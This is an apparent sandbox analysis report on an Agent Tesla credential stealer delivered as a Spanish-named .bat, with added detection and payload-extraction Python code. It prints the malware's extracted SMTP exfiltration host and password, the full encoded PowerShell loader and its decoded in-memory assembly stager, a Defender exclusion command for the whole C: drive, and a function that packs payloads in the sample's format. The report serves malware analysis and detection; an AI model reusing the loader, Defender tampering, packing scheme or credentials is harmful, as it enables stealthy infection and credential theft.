Analysis

max time kernel: 102s
max time network: 104s
platform: windows10-1703_x64
resource: win10-20231129-es
resource tags: arch:x64, arch:x86, image:win10-20231129-es, locale:es-es, os:windows10-1703-x64, system, windows
submitted: 06-12-2023 11:38
Static task: static1
Behavioral task: behavioral1
Sample: información del recibo de pago.bat
Resource: win10-20231129-es
General

Target: información del recibo de pago.bat
Size: 952KB
MD5: 504fba0abe6add67db0789d3d633d023
SHA1: 9d378def271f305b024bd1894516dc8cee68639c
SHA256: 532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66
SHA512: 01156ed686083a1b163661e3536fa438c38378687abc682597c1ffaf9872d1ae5004354992a907e3c3be1b9f805676e1dc3a3c07f6e06a1aff7448602a65127f
SSDEEP: 24576:ZjAnOhGCf0fFcQv+VJMUUwlEeGoP7lWVy6x/GF:siYGIUUALWVFsF
Malware Config

Extracted
- Protocol: smtp
- Host: mail.tecnosilos.com.py
- Port: 587
- Username: [email protected]
- Password: u(B[W[~XtT8,

Extracted (agenttesla)
- Protocol: smtp
- Host: mail.tecnosilos.com.py
- Port: 587
- Username: [email protected]
- Password: u(B[W[~XtT8,
- Email To: [email protected]

The two blocks are the same SMTP exfiltration config, the second one attributed to the Agent Tesla family parser with the recipient added. The address fields read "[email protected]" in this copy of the report; that is an e-mail obfuscation artifact of the page rather than the configured value, so the real mailboxes are not recoverable from here. The host, port and password are the usable indicators: the sample authenticates to a compromised or attacker-controlled mailbox on mail.tecnosilos.com.py over submission port 587 and sends stolen data as mail.
Signatures
-
AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and credential stealer. It harvests saved credentials from browsers, e-mail and FTP clients (the signatures below) and exfiltrates them, in this sample over SMTP using the extracted config. Here the payload is not a file on disk but a .NET assembly that the PowerShell stager in the process tree loads in memory.
-
Executes dropped EXE (1 IoC)
Processes:
- PID 1840  Blpgid.png
-
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers will often target it.
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
-
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes (registry keys opened by Blpgid.png, PID 1840):
- \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows:
- flow 1: api.ipify.org
- flow 2: api.ipify.org
-
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
- PID 1840  Blpgid.png (5 events)
- PID 2092  powershell.exe (3 events)
-
Suspicious use of AdjustPrivilegeToken (24 IoCs)
Processes:
- PID 1840  Blpgid.png: SeDebugPrivilege (reported twice)
- PID 2092  powershell.exe: SeDebugPrivilege (reported twice), SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privileges 33, 34, 35, 36 (reported by number only)
-
Suspicious use of WriteProcessMemory (12 IoCs)
Processes (each parent -> child pair is reported twice):
- PID 5040 cmd.exe -> PID 4908 cmd.exe
- PID 4908 cmd.exe -> PID 1996 cmd.exe
- PID 4908 cmd.exe -> PID 508 xcopy.exe
- PID 4908 cmd.exe -> PID 2780 cmd.exe
- PID 4908 cmd.exe -> PID 4564 xcopy.exe
- PID 4908 cmd.exe -> PID 1840 Blpgid.png
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path (1 IoC)
Processes:
- Blpgid.png opened key \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
outlook_win_path (1 IoC)
Processes:
- Blpgid.png opened key \REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
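The signatures above describe behaviour; the following is an added example, not part of the Triage report, of turning three of them into process-creation detections in Python: a copy utility writing powershell.exe out under a new name, execution of a non-executable extension from %TEMP%, and an -EncodedCommand whose decoded script loads an assembly or tampers with Defender. The events are constructed from the PIDs, images and command lines in the report's process tree; the field names (pid, ppid, image, cmdline), the short stand-in for PID 1840's encoded blob and the benign control event (PID 3000) are assumptions. PID 2092's encoded argument is copied verbatim from the report.

```python
import base64
import binascii
import re
from pathlib import PureWindowsPath

# Added example, not taken from the sandbox report: a small rule set run over
# constructed process-creation events modelled on this report's process tree.
# PIDs, images and command lines come from the report; the field names
# (pid, ppid, image, cmdline), the stand-in for PID 1840's -enc blob and the
# benign control event (PID 3000) are assumptions.


def enc(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Encoded argument of PID 2092, copied verbatim from the report.
SET_MP_B64 = "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA=="

EVENTS = [
    {"pid": 5040, "ppid": 1, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\información del recibo de pago.bat"'},
    {"pid": 4908, "ppid": 5040, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\información del recibo de pago.bat"'},
    {"pid": 508, "ppid": 4908, "image": r"C:\Windows\system32\xcopy.exe",
     "cmdline": r"xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Blpgid.png"},
    {"pid": 1840, "ppid": 4908, "image": r"C:\Users\Admin\AppData\Local\Temp\Blpgid.png",
     # constructed stand-in: the real blob is about 2.5 KB, this keeps only the two loader calls
     "cmdline": r"C:\Users\Admin\AppData\Local\Temp\Blpgid.png -win 1 -enc "
                + enc("$b = [System.Convert]::FromBase64String($x); [System.Reflection.Assembly]::Load($b)")},
    {"pid": 2092, "ppid": 0, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc " + SET_MP_B64},
    {"pid": 3000, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},  # constructed benign control
]

EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".dll"}
TEMP_MARKER = "\\appdata\\local\\temp\\"
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual spellings.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
COPY_OF_POWERSHELL = re.compile(r'(?i)powershell\.exe\s+("[^"]+"|\S+)\s*$')
SCRIPT_RULES = [
    (re.compile(r"Set-MpPreference\b.*?-(?:Exclusion|Disable)", re.I), "Defender tampering via Set-MpPreference"),
    (re.compile(r"\[System\.Reflection\.Assembly\]::Load\b", re.I), "in-memory .NET assembly load"),
    (re.compile(r"FromBase64String", re.I), "embedded base64 payload"),
]


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if there is none or it does not decode."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(events):
    """Run the three rules over process-creation events; returns a list of (pid, reason)."""
    findings = []
    for e in events:
        img = PureWindowsPath(e["image"])
        cmd = e["cmdline"]
        # Rule 1: something under %TEMP% executed with a non-executable extension
        # (the report's powershell.exe masquerading as Blpgid.png).
        if img.suffix.lower() not in EXECUTABLE_EXTS and TEMP_MARKER in str(img).lower():
            findings.append((e["pid"], "non-executable extension executed from Temp: " + img.name))
        # Rule 2: a copy utility writing powershell.exe out under a new name.
        if img.name.lower() in {"xcopy.exe", "robocopy.exe", "cmd.exe"}:
            m = COPY_OF_POWERSHELL.search(cmd)
            if m:
                dest = m.group(1).strip('"')
                if not dest.lower().endswith(".exe"):
                    findings.append((e["pid"], "powershell.exe copied to " + PureWindowsPath(dest).name))
        # Rule 3: decode -enc and look for the loader / Defender-tampering patterns.
        script = decode_encoded_command(cmd)
        if script:
            for rx, reason in SCRIPT_RULES:
                if rx.search(script):
                    findings.append((e["pid"], reason))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(EVENTS):
        print(pid, reason)
```

Rule 2 is the one that catches this chain earliest: the xcopy of powershell.exe (PID 508) fires before any PowerShell runs, and it is the step that defeats detections keyed on the image name powershell.exe. Rule 3 decodes rather than pattern-matching the base64, because the same script re-encodes to a different blob after any one-character change; note that -EncodedCommand only accepts UTF-16LE, so a decoder that tries UTF-8 first will produce garbage on real samples.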
Processes

- C:\Windows\system32\cmd.exe (PID 5040)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\información del recibo de pago.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 4908)
    Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\información del recibo de pago.bat"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\xcopy.exe (PID 508)
      Command line: xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Blpgid.png
      Copies the system powershell.exe into Temp under a .png name, so everything PowerShell does afterwards runs under an image name that rules keyed on powershell.exe do not match.
    - C:\Windows\system32\cmd.exe (PID 1996)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
      The "echo F" is the left-hand side of a pipe into xcopy, pre-answering its "file or directory?" prompt; there is one such cmd.exe per xcopy call.
    - C:\Windows\system32\cmd.exe (PID 2780)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
    - C:\Windows\system32\xcopy.exe (PID 4564)
      Command line: xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\información del recibo de pago.bat" C:\Users\Admin\AppData\Local\Temp\Blpgid.png.bat
      Copies the .bat itself next to the renamed PowerShell as Blpgid.png.bat; the stager below reads its payload from that copy.
    - C:\Users\Admin\AppData\Local\Temp\Blpgid.png (PID 1840)
      Command line: C:\Users\Admin\AppData\Local\Temp\Blpgid.png -win 1 -enc JABUAHYAZgBsAHIAcQBtAG8AIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHYAZgBsAHIAcQBtAG8AKQA7ACQASABjAHoAZgBiAGsAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABQAGkAaABkAGQAYgBtAHcAcwBxACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEgAYwB6AGYAYgBrAGgALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFAAaQBoAGQAZABiAG0AdwBzAHEALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFAAaQBoAGQAZABiAG0AdwBzAHEALgBDAGwAbwBzAGUAKAApADsAJABIAGMAegBmAGIAawBoAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGQAcQBwAHQAYQBuAHYAYwBpACkAOwAgACQAVABnAHEAcwB4AHMAdQByAHEAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABLAGQAcQBwAHQAYQBuAHYAYwBpACkAOwAgACQAUgBsAGwAaABhACAAPQAgACQAVABnAHEAcwB4AHMAdQByAHEAdgAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEUAcQBxAGEAYQBwAGYAcAByAHEAIAA9ACAAJABSAGwAbABoAGEALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
      Signatures: Executes dropped EXE; Accesses Microsoft Outlook profiles; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path
      Decoded -enc argument (UTF-16LE, base64), split at statement boundaries; the variable names are the sample's own:
        $Tvflrqmo = [IO.File]::ReadLines((([System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName).ToString() + ".bat"), [text.encoding]::UTF8) | Select-Object -last 1;
        $Kdqptanvci = [System.Convert]::FromBase64String($Tvflrqmo);
        $Hczfbkh = New-Object System.IO.MemoryStream( , $Kdqptanvci );
        $output = New-Object System.IO.MemoryStream;
        $Pihddbmwsq = New-Object System.IO.Compression.GzipStream $Hczfbkh, ([IO.Compression.CompressionMode]::Decompress);
        $Pihddbmwsq.CopyTo( $output );
        $Pihddbmwsq.Close();
        $Hczfbkh.Close();
        [byte[]] $Kdqptanvci = $output.ToArray();
        [Array]::Reverse($Kdqptanvci);
        $Tgqsxsurqv = [System.Reflection.Assembly]::Load($Kdqptanvci);
        $Rllha = $Tgqsxsurqv.GetExportedTypes()[0];
        $Eqqaapfprq = $Rllha.GetMethods()[0].Invoke($null, $null) | Out-Null
      Reading: MainModule.FileName of this process is Blpgid.png, so the stager opens Blpgid.png.bat (the copy made by PID 4564), takes its last line, base64-decodes it, gunzips it, reverses the byte order and hands the result to Assembly::Load, then invokes the first method of the first exported type. The assembly (Agent Tesla, per the config extraction above) is loaded from memory rather than written out as a separate executable; the 952 KB .bat is the carrier. The payload storage order is therefore reverse -> gzip -> base64, the mirror image of the decode chain.
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2092)
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
  Decoded -enc argument: Set-MpPreference -ExclusionPath C:\
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  Adds the whole C: drive to Microsoft Defender's exclusion list. Set-MpPreference needs administrative rights, which fits the broad privilege set reported for this PID under AdjustPrivilegeToken. The sandbox lists this process at the top level of the tree, i.e. it did not attribute it to a parent in the chain above.
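Re-implementing the decoding chain of the Blpgid.png stager above, as an added example that is not part of the report: a Python extractor that pulls the embedded assembly out of a .bat laid out like this one (payload on the last line, stored as base64 of a gzip of the byte-reversed binary). The report's 952 KB .bat is not reproduced here; build_sample_bat() fabricates a file with the same layout around a constructed fake MZ blob so the round trip runs offline. The batch lines inside it, including the %~f0 self-reference and the "<stager ...>" placeholder, are paraphrases and assumptions, not the sample's actual text.

```python
import base64
import gzip
import hashlib

# Added example, not part of the sandbox report: re-implements the decoding chain of
# the stager seen in the Blpgid.png command line, as a stand-alone extractor.
# The report's .bat is not embedded; build_sample_bat() fabricates a file with the
# same layout around a constructed fake payload, so the round trip runs offline.

# Constructed stand-in for the embedded assembly: an MZ header, filler and a PE
# signature, not the real Agent Tesla binary.
FAKE_ASSEMBLY = b"MZ\x90\x00" + bytes(range(256)) * 4 + b"PE\x00\x00" + b"\x00" * 128


def pack_payload(raw: bytes) -> str:
    """Inverse of the stager: reverse, gzip, base64. This is how the last line of the .bat is built."""
    return base64.b64encode(gzip.compress(raw[::-1])).decode("ascii")


def build_sample_bat(raw: bytes) -> str:
    """Constructed .bat with the layout the report shows: batch commands first, payload as the last line.
    The command lines are paraphrased from the process tree (the %~f0 self-reference is an
    assumption); the real 952 KB file is not reproduced."""
    lines = [
        "@echo off",
        r'xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "%TEMP%\Blpgid.png"',
        r'xcopy /d /q /y /h /i "%~f0" "%TEMP%\Blpgid.png.bat"',
        r'"%TEMP%\Blpgid.png" -win 1 -enc <stager base64 goes here>',
        pack_payload(raw),
    ]
    return "\r\n".join(lines) + "\r\n"


def extract_payload(bat_text: str) -> bytes:
    """Mirror of the stager: last non-empty line -> base64-decode -> gunzip -> reverse byte order.
    The sample uses [IO.File]::ReadLines ... | Select-Object -last 1; skipping blank lines
    makes this tolerant of a trailing newline. Raises ValueError / OSError when the last
    line is not a base64 gzip blob, which is the signal that the layout differs."""
    last = [ln for ln in bat_text.splitlines() if ln.strip()][-1]
    return gzip.decompress(base64.b64decode(last))[::-1]


def describe(raw: bytes) -> dict:
    """What an analyst records before handing the blob to a .NET decompiler."""
    return {
        "is_pe": raw[:2] == b"MZ",
        "size": len(raw),
        "sha256": hashlib.sha256(raw).hexdigest(),
    }


if __name__ == "__main__":
    sample = build_sample_bat(FAKE_ASSEMBLY)
    blob = extract_payload(sample)
    print(describe(blob))
```

Against a real file, call extract_payload(open(path, encoding="utf-8").read()) and feed the returned bytes to a .NET decompiler; describe() gives the hash to pivot on, which is the hash of the assembly itself rather than of the .bat wrapper, so it survives re-obfuscation of the batch and PowerShell layers. Because the stager only ever reads the last line, the byte-reversal and gzip are obfuscation, not protection: no key is involved, and the extractor needs nothing from the sandbox run.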
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 435KB
MD5: f7722b62b4014e0c50adfa9d60cafa1c
SHA1: f31c17e0453f27be85730e316840f11522ddec3e
SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
Filesize: 952KB (identical hashes to the submitted sample)
MD5: 504fba0abe6add67db0789d3d633d023
SHA1: 9d378def271f305b024bd1894516dc8cee68639c
SHA256: 532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66
SHA512: 01156ed686083a1b163661e3536fa438c38378687abc682597c1ffaf9872d1ae5004354992a907e3c3be1b9f805676e1dc3a3c07f6e06a1aff7448602a65127f
-
Filesize: 1B (these are the hashes of the single ASCII byte "1")
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a